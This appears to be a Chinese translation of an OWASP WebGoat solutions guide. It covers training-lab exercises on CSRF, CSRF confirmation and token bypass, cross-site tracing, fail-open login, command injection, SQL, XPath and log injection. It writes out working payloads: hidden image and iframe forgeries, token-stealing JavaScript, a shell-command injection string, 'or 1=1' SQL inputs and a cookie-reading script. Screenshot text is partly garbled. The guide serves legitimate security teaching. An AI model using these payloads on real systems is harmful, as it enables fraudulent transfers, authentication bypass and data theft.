要完成这一课,您需要在消息框中嵌入 HTML 代码。这段代码中包含一个图片,链接到 一个网站。在 HTML 中图片的格式是:

<img src="[URL]" width="1" height="1" />

创建一个新消息,命名为"Test",消息中加入这段HTML代码。

<img src="http://localhost/WebGoat/attack?Screen=81&menu=210&transferFunds=5000" width="1" height="1" />

w to Perform Cross Site Request F	orgery (CSRF) - Windo	ws Internet Explorer		
🕢 • 👔 http://webGoat/attack/	show-Newtonitolinet.		× 4+ ×	P
gle C- Go + C B -	Vakdate Drages Resize	0 Bloded   🏷 Check + 🔌 Autolark + 🦙 Annifi 🍙 Sendito+ 🌛 Mic: Stron Fuler		C) Settings
🖗 📸 Hourits Perform Cross Site Reque	st Forgery (CSRF)		<u>⊜</u> •⊡-⊕•	Enge + 🔘 Taols +
4		Logout 🕥		
OWASP WebGoat VS	How to Perf	orm Cross Site Request Forgery (CSRF)		
Linis Functions	and the second second			
General Code Quality Unvalidated Parameters	Include this URL in t	Restart this Lesson		
Uning an Access Control Matrix New In Robert a Path Read, New In Robert a Path Read,	Cing arew http://ic Screen=01&memo=2108	calhest/WebGost/attagt" transferTunde=5005 vidth="1" height="1" />		
Hours In Par-Terrer Cropp Site Request Forgers (CMP)	Your goal is to send an a malicious request. Tr point to the CSRF lesso	emails a new agroup that contains an image whose URL is pointing to to include a IA1 posel image that includes a URL. The URL should with an extra parameter. Transferfunction=4007. You can capy the		
Remote Admin Access	shortcut. Whoever rece his funds transferred. It	wes this email and happens to be authenticated at that time will have then you think the attack is successful, refresh the page and you will		
Eroken Authentication and Session Management	find the green check or	the left hand side menu.		
Cross-Site Scripting (XSS) Buffer Overflows	Titlei Test	The same new second of the second second		
Ingection Flaws Improved Form Handling Imacure Storage Denial of Service Insectore Configuration Ranagement Web Services AJAX Security	Message: Hacked) a Sozeen=81 height=*1	<pre>imp src*"http://localhost/WebGot/attack? wmmu=210ttransferFunds=B000' vidth=#1# * /&gt;</pre>		
Challenge	Submit			

页面刷新后,您会在消息列表中看到一个新的消息。



- # http://http://webGoak/at	tashmenu-200	× ++ ×	P -
ogle C- Go+ Co	🛃 + 🟠 Socienaria- 👼 Willoodad l 🗇 Check + 🔨 Autoria - 🔚 sub Fil 🍙 Sendita- 🖋 direc Validata Jangas Resion Mais StoorRuler		@ Settings +
🔗 👩 How to Perform Cross Site H	Request Forgery (CRFF)	A • 0 · ₩ •	the - O tell - 1
Admin Functions Garard Garard Garard Cole Quality Cole Quality Cole Quality Units A coless Current Wate A coless Current Wate A coless Current Mana Curre Schwart Neues Carls Schwart Neues Carls Schwart Neues Carls Schwart Bestand Management Cole Courtises Daylor Courtises Daylo	<pre>control the second control of the secon</pre>		
	A PARTICIPATION OF THE PARTICI		

点击这个消息,这将会下载这个消息并以 HTML 的方式显示,这时用 WebScarab 来截获 请求。在其中添加"&transferFunds=5000",然后确定。



刷新页面后,该课完成。

# 2.8.5 绕过 CSRF 确认( CSRF Prompt By-Pass)

### 2.8.5.1 技术概念或主题(Concept / Topic To Teach)

本节课程将指导您如何实现跨站请求伪造攻击(CSRF),包括通过多个请求绕过用户确



认脚本命令。

## 2.8.5.2 技术原理(How it works)

网页中所有手动发起的请求操作,其实质是通过 HTML+JavaScript 向服务器发起请求。

#### 2.8.5.3 总体目标(General Goals)

类似于 CSRF 课程,您的目标是给新闻组发送一封带有多个威胁请求的 Email。第一个请求用户资金转账,第二个用于自动处理第一个请求所触发的确认。URL 必须使用以下两个外部参数 "transferFunds=4000"和 "transferFunds=CONFIRM"。可以通过在左侧链接中右键鼠标,复制快捷方式完成 URL 获取。任何收到该邮件的人若正好已经通过认证,则当其访问该页面时将自动完成资金转账。

注意:不同 WebGoat 环境的 URL 中 "Screen"和 "Menu"参数可能会有所区别。请使 用您当前访问 URL 中正在使用的参数。

#### 2.8.5.4 操作方法(Solutions)

构造一个类似于 CSRF 实验中的图片或 iframe 标记: <img

src="http://localhostattack?Screen=81&menu=210&transferFunds=5000" width="1" height="1" /> 该图片请求不会导致资金转移,而是触发一个需要用户确认的信息。要查看确认提示信息,请尝试在本课程的 URL 中增加外部参数"transferFunds=4000"。





查看源代码找到确认请求的参数信息。用于确认的 form 表单如下:

<form accept-charset='UNKNOWN' method='POST' action='attack?Screen=5&menu=900'</pre>

enctype='application/x-www-form-urlencoded'>

<input name='transferFunds' type='submit' value='CONFIRM'>

<input name='transferFunds' type='submit' value='CANCEL'>

</form>

通过以上代码可知,下一个需要伪造的 URL 如下: attack?Screen=5&menu=900&transferFunds=CONFIRM

本方案将为您展现如何通过 iframes 和 images 两种方式实现攻击。下一步是添加附加的 伪造确认请求。尽管如此,这还不够。第二个请求必须在第一个请求结束后被载入。所以需 要添加 javascript 以实现在第一个请求结束后自动载入第二个:在第一个 frame 的属性中添 加 onload 参数,设置 src 为第二个 frame。

代码如下:

#### <iframe

src="http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=400"

id="myFrame" frameborder="1" marginwidth="0"

marginheight="0" width="800" scrolling=yes height="300"

onload="document.getElementById('frame2').src='http://localhost:8080/WebGoat/attack?Screen=5 &menu=900&transferFunds=CONFIRM';">

</iframe>

<iframe

id="frame2" frameborder="1" marginwidth="0"

marginheight="0" width="800" scrolling=yes height="300">

#### </iframe>

将以上信息提交到消息框中发表。





以下显示当点击访问该风险的 iframe 消息时的结果。





上图第一个 frame 显示了用户确认信息,这是第一位早的请求所触发的结果。第二个 frame 显示的是伪造的确认请求触发的结果: 4000 美元已经成功转账。刷新页面,完成根据 本节课程。

事实上,在真实的攻击中以上信息将被隐藏。点击"restart this lesson"后再次对网站发起 攻击,本次攻击尝试使用隐蔽或非常小的 frames 实现攻击信息隐藏。

对于图片来说,如果载入的是一个 HTML 则会触发一个错误。所以此处可通过替换 onload 属性,实现工具目的。

<img <="" src="http://localhostattack?Screen=81&amp;menu=210&amp;transferFunds=5000" th=""/>
onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transf
erFunds=CONFIRM'" width="1" height="1" />
<img height="1" id="image2" width="1"/>

在输入框中插入该图片代码,提交消息尝试攻击。



提交后刷新消息页面,可发现成功通过本课程。对于开发者来说限制 CSRF 的一种方法 是只允许通过 HTTP POST 提交参数。该方式将屏蔽通过 iframe 和 images 方式发起的攻击, 但对 JavaScript 中的 XmlHTTpRequest 无效。由于额外的信任,您可以尝试通过 XmlHTTpRequest 发起基于 POST 的攻击。

# 2.8.6 绕过 CSRF Token(CSRF Token By-Pass)

#### 2.8.6.1 技术概念或主题(Concept / Topic To Teach)

本节课程将指导您如何在启用 CSRF Token 防护的网站上发起跨站请求伪造攻击(CSRF)。

跨站请求伪造攻击(CSRF/XSRF)欺骗用户(那些已经获取了系统的信任)点击带有 伪造请求的页面从而执行相关命令。

基于 Token 的请求认证用于阻止此类攻击者。该技术在请求发起页面插入 Token。Token 用于完成请求和并验证该操作不是通过脚本执行的。OWASP 提供的 CSRFGuard 使用该技术以阻止 CSRF 攻击。





尽管如此,但如果该站点存在 XSS 攻击漏洞,则该技术可被绕过。由于浏览器同源策略,相同域名下的页面能够读取其它页面的内容。

#### 2.8.6.2 技术原理(How it works)

网页中所有手工发起的请求操作,其实质通过 HTML+JavaScript 向服务器发起请求。

#### 2.8.6.3 总体目标(General Goals)

与 CSRF 课程类似,您的目标是给新闻组发送包含恶意请求的 Email 实现资金转账。为了成功完成欺骗,您需要获得一个验证请求 Token。显示转账表单的 URL 类似于 CSRF 课程 中使用的外部参数"transferFunds=main"。载入该页面,读取 Token 并追加到伪造请求中以实 现资金转账。

注意:不同 WebGoat 环境的 URL 中 "Screen"和 "Menu"参数可能会有所区别。请使 用您但前访问 URL 中正在使用的参数。

#### 2.8.6.4 操作方法(Solutions)

类似于 CSRF 课程,您必须伪造资金转账的请求。尽管如此,如果请求中没有包含正确的 Token,资金转账不会成功。要找到验证 Token,您需要查看网站生成的资金转账页面的表单内容。要查看资金转账页面,需要在本节课程 URL 中增加外部参数"transferFunds=main"。



下面查看网页源代码,找到 Token 参数。



<form accept-charset='UNKNOWN' id='transferForm' method='POST'

action='attack?Screen=2&menu=900' enctype='application/x-www-form-urlencoded'>

<input name='transferFunds' type='text' value='0'>

<input name='CSRFToken' type='hidden' value='1745740650'>

<input type='submit'>

</form>

由此可以看到伪造命令需要提交 CSRFToken 参数。

该解决方式是在一个 iframe 中载入页面,然后从该 frame 中读取出 Token。

下面查看网页源代码,找到 Token 参数。由于两个页面在一个域名下,基于同源策略, 这样的操作是可行的。所以,尽管该页面采取了阻止 CSRF 攻击的措施,但由于 CSS 漏洞的 存在该措施能够被规避。下面的 JavasScript 通过 frame->forme 的路径可以读取并保存 CSRFToken 参数。

```
var tokenvalue;
function readFrame1()
{
    var frameDoc = document.getElementById("frame1").contentDocument;
    var form = frameDoc.getElementsByTagName("form")[1];
    var token = form.CSRFToken.value;
    tokenvalue = '&CSRFToken='+token;
    loadFrame2();
}
function loadFrame2()
{
    var testFrame = document.getElementById("frame2");
    testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+t
    okenvalue;
}
```

readFrame1 从 frame 内容中读取 CSRFToken, 保存并调用 loadFrame2。LoadFrame2 将追加该参数并载入第二个 frame。

下面的 frames 将在第一个 frame 中载入转账页面。载入完成后,它将调用 readFrame1,该 Frame 将调用 loadFrame2。loadFrame2 用于设置第二个 frame 的 src。

```
<iframe src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=main"
onload="readFrame1();"
id="frame1" frameborder="1" marginwidth="0"
```



marginheight="0" width="800" scrolling=yes height="300"></iframe>

<iframe id="frame2" frameborder="1" marginwidth="0"

marginheight="0" width="800" scrolling=yes height="300"></iframe>

下图显示的是在消息框中插入的代码。

Edit View History Bookn	narks Iool	s Help			- prost (Con	-
Lon Lon of The		- mob		100		
	//localhost:8	3080/WebGoat/attack?Screen=2&men	u=900	<u>ନ</u> ା *	Google	- 95
Most Visited 🗸 🚞 CSRF 🛩 🚞	workTools >	🗸 🚞 Old bookmarks 🗸 斗 🚔 java 🗸 🍃	🖥 java security 🗸 📄 SecRef 🗸 🛛	📔 ToRead 🛩 🛛 🚔 Test 🛩	🧀 Tomcat 👻 📔 caucho-resin 👻	**
Most Visited V Park CSRF V Park Visited V Park Visited V Park Visited	VorkTools > I Hints Solution to transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer transfer Submin Submin	Old bookmarks      Java      Java      Sow Param Show Cookes Lise     Mow Param Show Cookes Lise     Mow Param Show Cookes Lise     Sow Param Show Cookes Lise	a java security > SecRaf > Logou CCSRF Token By-P2 exon Plan Show Jaw Solution no lis to seed a request the solution to solution a value of request the solution to solution a value of request the solution to a dapped the token in a formad is consended as a consense of the solution of the solution a value of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of the solution of t	Bread     Company     Com	🕞 Tomcat \vee 🔛 caucho resin V	
Cross Site Tracing (XST)				_		
Autors Derial of Service Improper Error Handling Improper Error Handling Insecure Communication Insecure Storage Parametr Tampening Parametr Tampening Web Service Admin Functions Challenge	OWASP	De	rrived from CSRF Lesson by Sherif Kr	uussa		
auto-sharen to	Lee .					10

下图显示了点击该页面后的结果。注意,该步骤未采取任何隐藏 frames 的 措施,建议您尝试采取隐藏 iframes 措施后再次提交 POST 请求。

下图是隐藏处理后的结果。





## 2.8.7 HTTPOnly 测试(HTTPOnly Test)

OWASP 中日

#### 2.8.7.1 技术概念或主题(Concept / Topic To Teach)

为了降低跨站脚本攻击的威胁,微软引入了新的 cookie 属性字段: "HTTPOnly"。一 旦该字段被标记,浏览器将禁止客户端脚本访问 Cookie。由于该属性相对较新,有些浏览 器还无法正确处理这个属性。

#### 2.8.7.2 技术原理(How it works)

无。

#### 2.8.7.3 总体目标(General Goals)

本课程目的是测试您的浏览器是否支持"HTTPOnly"的 cookie 标志。注意"unique2u"的 cookie 值。如果您的浏览器支持"HTTPOnly",并启用了一个 cookie,客户端的代码是不能够读取或写入 cookie 的,但是仍然可以向浏览器发送它的值。有些浏览器只能防止客户端读访问,无法防止写访问。



## 2.8.7.4 操作方法(Solutions)

分别在启用和禁用"HTTPOnly"的情况下点"Read Cookie"和"Write Cookie",查 看其中的不同,在不启用 HTTPOnly 的情况下,能够看到 unique2u 的值,而启用 HTTPOnly 之后则无法看到这个值。

Window	s Internet Explorer
⚠	unique2u=8lO5mel3DCyZMxBFAKoWjoNyr98=; JSESSIONID=9167E3A6F58BD9C2A4623079A39E8224
	ОК

## 2.8.8 跨站跟踪攻击(Cross Site Tracing (XST) Attacks)

#### 2.8.8.1 技术概念或主题(Concept / Topic To Teach)

过滤所有用户输入是一个不错的做法,特别是那些后期会被用作 OS、脚本或数据库查 询参数的输入。尤其是那些将要长期存储的内容。用户不能创建非法的消息内容,例如:可 以导致其他用户访问时载入非预期的页面或内容。

#### 2.8.8.2 技术原理(How it works)

HTTP 方法包括: HEAD、GET、POST、TRACE、PUT、DELETE 等。

### 2.8.8.3 总体目标(General Goals)

Tomcat 支持 HTTP TRACE 命令,您的目标是执行跨站跟踪攻击。



#### 操作方法(Solutions) 2.8.8.4

您需要使用跨站点跟踪攻击,这可以通过在"three digit access code"中嵌入脚本来实现。 以下脚本通过 XMLHTTP 提交 HTTP TRACE 数据:

<script type="text/javascript">if ( navigator.appName.indexOf("Microsoft") !=-1) {var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open("TRACE", "./", false); xmlHttp.send();str1=xmlHttp.responseText; while (str1.indexOf("\n") > -1) str1 = str1.replace("\n","<br> document.write(str1);}</script>

Solution VideosIt is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.

#### General Goal(s):

Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.

Shopping Cart					
Shopping Cart Items To Buy Now	Price	Quantity	Total		
Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry	69.99	1	\$69.99		
Dynex - Traditional Notebook Case	27.99	1	\$27.99		
Hewlett-Packard - Pavilion Notebook with Intel® Centrino?	1599.99	1	\$1599.99		
3 - Year Performance Service Plan \$1000 and Over	299.99	1	\$299.99		

The total charged to your credit card: \$1997.96

Update Cart

Enter your credit card number:

4128 3214 0002 1999 Enter your three digit access code: ment.write(str1);}</script>

Purchase



Solution VideosIt is always a good practice to scrub all input, especially those inputs that will later be used as

parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.

#### General Goal(s):

Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.

#### \* Congratulations. You have successfully completed this lesson.

\* Whoops! You entered instead of your three digit code. Please try again.

Shopping Cart Items To Buy Now	Price	Quantity	Total
Studio RTA - Laptop/Reading Cart with Tilting Surface - Cherry	69.99	1	\$69.99
Dynex - Traditional Notebook Case	27.99	1	\$27.99
Hewlett-Packard - Pavilion Notebook with Intel® Centrino?	1599.99	1	\$1599.99
3 - Year Performance Service Plan \$1000 and Over	299.99	1	\$299.99
The total charged to your credit card Enter your credit card number:	: \$1997. 4128 3	96 3214 0002 1999	Update Cart
Enter your three digit access code:	<scrip< td=""><td>t type="text/javascri</td><td></td></scrip<>	t type="text/javascri	
Purchas	e		

# 2.9 不当的错误处理(Improper Error Handling)

## 2.9.1 打开认证失败方案(Fail Open Authentication Scheme)

#### 2.9.1.1 技术概念或主题(Concept / Topic To Teach)

本节课程介绍了关于认证"无法打开"的基本知识。用安全术语来讲,"fail open"描述了一个验证机制的行为。这是一个验证方法的验证结果为"true"时发生的错误(意外的异常)。在登录过程中,这是特别危险的。

#### 2.9.1.2 技术原理(How It works)

Java 代码中异常处理部分为成功认证行为进行异常捕获。该异常产生是因为密码字段使用了空指针。.



## 2.9.1.3 总体目标(General Goals)

在这一课中,用户需要绕过认证检查。

### 2.9.1.4 操作方法(Solutions)

以用户名 webgoat 登录, 开启 webscarab, 进行拦截。

Solution VideosDue to an error handling problem in the authentication Restart this Lesson mechanism, it is possible to authenticate as the 'webgoat' user without entering a password. Try to login as the webgoat user without specifying a password.

Sign In Please sign in to y an account. *Required Fields	our account. See the	e OWASP admin if you do not have	
*User Name:	webgoat		
*Password:			
			•
		ASPECT SECUR	nerialists

选中"Password"一栏,点击"Delete"删除该选项,然后选择"Accept Changes"提

25
X

Parsed	Raw										
Method U	રા										Version
POST h	ttp://loc	//localhost:8080/WebGoat/attack?Screen=60&menu=1100								HTTP/1.1	
Header							Value			-	
Accent	ima	900xv medv.em.vhnoitesilane naninanemi Imv+lmevinnitesilane iin)anemi noitesilane.em.vhnoitesilane naninanemi									
Referer	http	illocalho	st:8080	WebGoat/	attack?Screer	1=60&me	nu=1100		ielelle 21 elelene aneret the treat th	-	
Accept-Lan	zh-0	CN								- =	Insert
Jser-Agent	Moz	illa/4.0 (c	ompatit	le; MSIE 8.	0; Windows N	JT 6.1; Tr	ident/4.0; SLCC2; .	NET C	LR 2.0.50727; .NET CLR 3.5.307		Delete
Content-Ty	app	lication/x	-www-fe	rm-urlenco	ded	192	10			-	Doloto
Accept-Enc	gzip	, deflate									
Host	loca	alhost.:80	80							-	
LIDI Enco	hoh	Toyt	Hoy								
UNLENCO	ueu	TEAL	пел							_	
			Varial	ole					Value		
Username						W	ebgoat				
Password											
SUBMIT						L	igin				
											Insert
											moort
											Delete

登录成功。





Solution VideosDue to an error handling problem in the authentication Restart this Lesson mechanism, it is possible to authenticate as the 'webgoat' user without entering a password. Try to login as the webgoat user without specifying a password.

#### \* Congratulations. You have successfully completed this lesson.

#### Welcome, webgoat

You have been authenticated with Fail Open Error Handling

<u>Logout</u>

Refresh

ASPECT SECURITY

## 2.10 注入缺陷(Injection Flaws)

## 2.10.1命令注入(Command Injection)

#### 2.10.1.1 技术概念或主题(Concept / Topic To Teach)

命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。这种攻击技术背后 的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这类风险数目令人难以 置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响。但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数 据库查询语句的数据。

#### 2.10.1.2 技术原理(How It works)

在正常的参数提交过程中,添加恶意的代码,往往能够得到以外的收获。

#### 2.10.1.3 总体目标(General Goals)

本节要求学员能够在目标主机上执行任何系统命令。



## 2.10.1.4 操作方法(Solutions)

启动 WebScarab。在课程页面的下拉列表中任意选择一个页面,然后点"View"



通过 WebScarab 截获请求,在所请求的页面处添加""& netstat -an & ipconfig"。注意,有个英文双引号。

🎂 Edit Request										
Intercept requests : 🗹 Intercept responses : 🗌										
Parsed Raw										
Method URL				Version						
POST http://neo:80/Web	POST http://neo:80/WebGoat/attack?menu=610									
Header		Valu								
Accept	ir	mage/gif, image/x-xbitm;	ap, image/ipeg, ima 🔺							
Referer	h	ttp://neo/WebGoat/attacl								
Accept-Language	n	l-be								
Content-Type	a	pplication/x-www-form-u								
UA-CPU	X	86	Insert							
Accept-Encoding	g	zip, deflate	Delete							
User-Agent	N	lozilla/4.0 (compatible; l	Delete							
Proxy-Connection	k	(eep-Alive								
Content-length	4	5								
Host	n	eo								
Pragma	n	o-cache	•							
A.T.										
URLEncoded	Hex									
Variabl	9	Va								
HelpFile		sicAuthentication.help"	Insert							
SUBMIT		View	Delete							
				Delete						
] ▲.₩.										
Accept changes	Cancel changes	Abort request	Cancel ALL inter	cepts						

点击执行后返回页面,在这个页面中能看到网络端口使用情况和 IP 地址。通过这种方 式实现了攻击。




### 2.10.2数字型 SQL 注入(Numeric SQL Injection)

### 2.10.2.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击 技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目 令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。

### 2.10.2.2 技术原理(How It works)

在 station 字段中注入特征字符,能组合成新的 SQL 语句。 SELECT \* FROM weather\_data WHERE station = [station]

### 2.10.2.3 总体目标(General Goals)

下面的表单允许用户查看天气数据。请通过注入 SQL 字符串的方式查看所有的天气数据。



### 2.10.2.4 操作方法(Solutions)

打开 WebScarab, 然后选择一个城市, 点"GO", WebScarab 中会显示该城市编号, 在编号后面添加"1=1", 确定

Parsed	Raw				
Method U	RL.				Version
POST	ttp://lo	alhost 80/	WebGoat/attack?Screen=59&m	nenu=610	HTTP/1.1
Header	loca	alhost		-	Insert
User-Agen	t Moz	illa/5.0.000	ndows. U. Windows.NT.6.0: de	N181 *	Delete
URLEnco	ded	Text	lex		
	Vari	able	Value		
station			101 or 1=1		Insert
SUBMIT			Gol		Delete
					Delete

攻击成功,显示所有城市的天气情况

\* Congratulations. You have successfully completed this lesson. \* Start this lesson over to attack a parameterized query.

Select your local weather station: Columbia 💌

Go!

SELECT \* FROM weather\_data WHERE station = 101 or 1 = 1

STATION	NAME	STATE	MIN_TEMP	MAX_TEMP
101	Columbia	MD	-10	102
102	Seattle	WA	-15	90
103	New York	NY	-10	110
104	Houston	ТХ	20	120
10001	Camp David	MD	-10	100
11001	Ice Station Zebra	NA	-60	30

### 2.10.3日志欺骗(Log Spoofing)

### 2.10.3.1 技术概念或主题(Concept / Topic To Teach)

本节课程将教会您如何使用障眼法。

### 2.10.3.2 技术原理(How It works)

这种攻击是在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹。



"

### 2.10.3.3 总体目标(General Goals)

灰色区域代表在 Web 服务器的日志中的记录的内容。您的目的是使用户名为 "admin" 的用户在日志中显示 "成功登录"。

升级您的攻击,例如:在日志文件中插入脚本。

### 2.10.3.4 操作方法(Solutions)

本节课程接受用户输入的任何一个用户名,并将其追加到日志文件中。

在文本框中输入用户名: "smith Login Succeeded for username admin",这样用户名后面的信息会在同一行显示,而不是在新的一行。

Solution Videos\* The grey area below represents what is going to be Restart this Lesson logged in the web server's log file.

\* Your goal is to make it like a username "admin" has succeeded into logging in. \* Elevate your attack by adding a script to the log file.

Username: Password: Login	
Login failed for username: smith Login Succeeded for username admin	
Created by Sherif Koussa maa cadamia	n
OWASP Foundation   Project WebGoat   Report Bug 这样您可以往该应用中注入回车(0D%)和换行符(%0A)。在 username 中填入 Smith%0d%0aLogin Succeeded for username: admin",这样就完成了该课程。 Solution Videos* The grey area below represents what is going to be Restart this Lesson logged in the web server's log file. * Your goal is to make it like a username "admin" has succeeded into logging in. * Elevate your attack by adding a script to the log file. * Congratulations. You have successfully completed this lesson.	
Username: Password: Login	
Login failed for username: Smith Login Succeeded for username: admin Created by Sherif Koussa maacadamian	

攻击者可以利用这种方式向日志文件中添加恶意脚本,脚本的返回信息管理员能够通过 浏览器看到。如果把 "admin <script>alert(document.cookie)</script>" 作为用户名输 入会有什么情况发生呢?



Solution Videos* The grey area below represents what is going to be Res logged in the web server's log file. * Your goal is to make it like a username "admin" has succeeded into loggin * Elevate your attack by adding a script to the log file.	start this Lesson g in.
Username:	
Password: Login	
Login failed for username: admin	
来自网页的消息	
JSESSIONID=4A42E8023A57F9B2C86C8DC085EF557F	
确定	

### 2.10.4XPATH 型注入(XPATH Injection)

### 2.10.4.1 技术概念或主题(Concept / Topic To Teach)

本节课程将教会您如何实施 XPath 注入攻击。

### 2.10.4.2 技术原理(How It works)

与 SQL 注入类似, XPATH 注入发生在当网站使用用户提供的信息查询 XML 数据时。 通过向网站故意发送异常信息,攻击者可以发现 XML 数据的结构或访问那些本来无法访问 到的数据。如果该 XML 是一个用户认证文件(例如一个基于 XML 的用户文件),攻击者 还能借此提升自己在网站中的特权。使用 XPATH 查询 XML,通过一个简单的描述性语句 类型,允许 XML 查询,找到一条信息。像 SQL 一样,您可以指定找到的某些属性与模式 匹配。

当一个网站中使用 XML,它是普遍接受某种形式的输入,查询字符串,找到并将标识的内容显示在页面上。此类输入必须进行清洗,以验证它不会影响 XPATH 的查询,并返回错误数据。

### 2.10.4.3 总体目标(General Goals)

以下表单允许员工看到自己的所有个人资料,包括他们的薪酬。您的账户是 Mike/test123.



您的目标是尝试看到其他雇员的数据。

### 2.10.4.4 操作方法(Solutions)

XPATH 注入类似于 SQL 注入。通过未验证的输入创建一个 XPATH 查询。下面您能看到如何构建一个 XPATH 查询。该页面代码如下:

String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml");

File d = new File(dir);

XPathFactory factory = XPathFactory.newInstance();

XPath xPath = factory.newXPath();

InputSource inputSource = new InputSource(new FileInputStream(d));

String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" +

password + "']";

nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET);

在用户名处注入 Smith' or 1=1 or 'a'='a,这将会显示您登录系统的第一个用户。密码是必须的字段,可以任意输入。

以下是服务器获取的:

expression = "/employees/employee[loginID/text()='Smith' or 1=1 or 'a'='a' and

passwd/text()='password']"

以下是服务器解析后的结果:

expression = "/employees/employee[ ( loginID/text()='Smith' or 1=1 ) OR ( 'a'='a' and

passwd/text()='password' ) ]"

输入后点登录即可看到其他人的信息,完成本节课程。

### 2.10.5字符串型注入(String SQL Injection)

### 2.10.5.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。



### 2.10.5.2 技术原理(How It works)

基于以下查询语句构造自己的 SQL 注入字符串。 SELECT \* FROM user\_data WHERE last\_name = '?'

### 2.10.5.3 总体目标(General Goals)

下面的表格,允许用户查看他们的信用卡号码。尝试通过 SQL 注入将所有信用卡信息显示出来。尝试的用户名是"Smith"。

### 2.10.5.4 操作方法(Solutions)

输入以下代码即可完成本课程内容。

' or 1=1 – // 或者

Smith' or 1=1 --

\* Congratulations. You have successfully completed this lesson. \* Bet you can't do it again! This lesson has detected your successfull attack and has now switched to a defensive mode. Try again to attack a parameterized query.

Enter your last name: ' or 1=1 -- Go!

SELECT \* FROM user\_data WHERE last\_name = '' or 1=1 --'

USERID	FIRST_NAME	LAST_NAME	CC_NUMBER	CC_TYPE	COOKIE	LOGIN_COUNT
101	Joe	Snow	987654321	VISA		0
101	Joe	Snow	2234200065411	MC		0
102	John	Smith	2435600002222	MC		0
102	John	Smith	4352209902222	AMEX		0
103	Jane	Plane	123456789	MC		0
103	Jane	Plane	333498703333	AMEX		0
10312	Jolly	Hershey	176896789	MC		0
10312	Jolly	Hershey	333300003333	AMEX		0
10323	Grumpy	White	673834489	MC		0
10323	Grumpy	White	33413003333	AMEX		0
15603	Peter	Sand	123609789	MC		0
15603	Peter	Sand	338893453333	AMEX		0
15613	Joesph	Something	33843453533	AMEX		0



### 2.10.6小实验: SQL 注入(LAB: SQL Injection)

### 2.10.6.1 技术概念或主题(Concept / Topic To Teach)

SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁。这种攻击技术背后的技术方法,简单易学,能造成大范围的损害,危及系统安全。尽管这些风险数目令人难以置信,互联网中的系统很容易受到这种形式的攻击。

这种攻击容易扩散,造成更坏的影响,但是对于这类威胁,一点常识和预先预防几乎可 以完全阻止。这节课将为学员展示几个参数注入的例子。

尽管 SQL 注入威胁可能已经通过其它方式被拦截,但"清洗"所有输入数据总是不错的做法,尤其是那些将被用于操作系统命令、脚本和数据库查询语句的数据。

### 2.10.6.2 技术原理(How It Wokrs)

应用程序会将您的输入带入后台的 SQL 查询语句。

### 2.10.6.3 Stage 1: 字符串型注入(Stage 1: String SQL Injection)

### 2.10.6.3.1 总体目标(General Goals)

使用 SQL 注入绕过认证。

### 2.10.6.3.2 操作方法(Solutions)

以用户 Neville 登录,确保 WebScarab 已经启动,并选中了"intercept request"。 任意输入一个密码,然后登录。

在 WebScarab 的 password 中修改密码为 smith' OR '1' = '1, 如图:



Intercept requests : 🔽 Intercept responses : 📃

Parsed	Raw								
Method URI									
POST http	PORT http://localhoet-2020AM/abGoat/attack/29croon=54/8manu=1200								
1001									
Header		Value							
Accept	image/jpeg, application/	/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap							
Referer	http://localhost.:8080/We	ebGoat/attack?Screen=54&menu=1200							
Accept-Lan	zh-CN								
User-Agent	Mozilla/4.0 (compatible; l	MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30	7						
Content-Ty	application/x-www-form-	-urlencoded							
Accept-Enc	gzip, deflate								
Host	localhost.:8080		-						
URLEncode	URLEncoded Text Hex								
	Variable	Value							
employee_id 112									
password	assword smith' OR '1'= 1								

Login

passwo action

得到所有人员列表后该步骤完成。

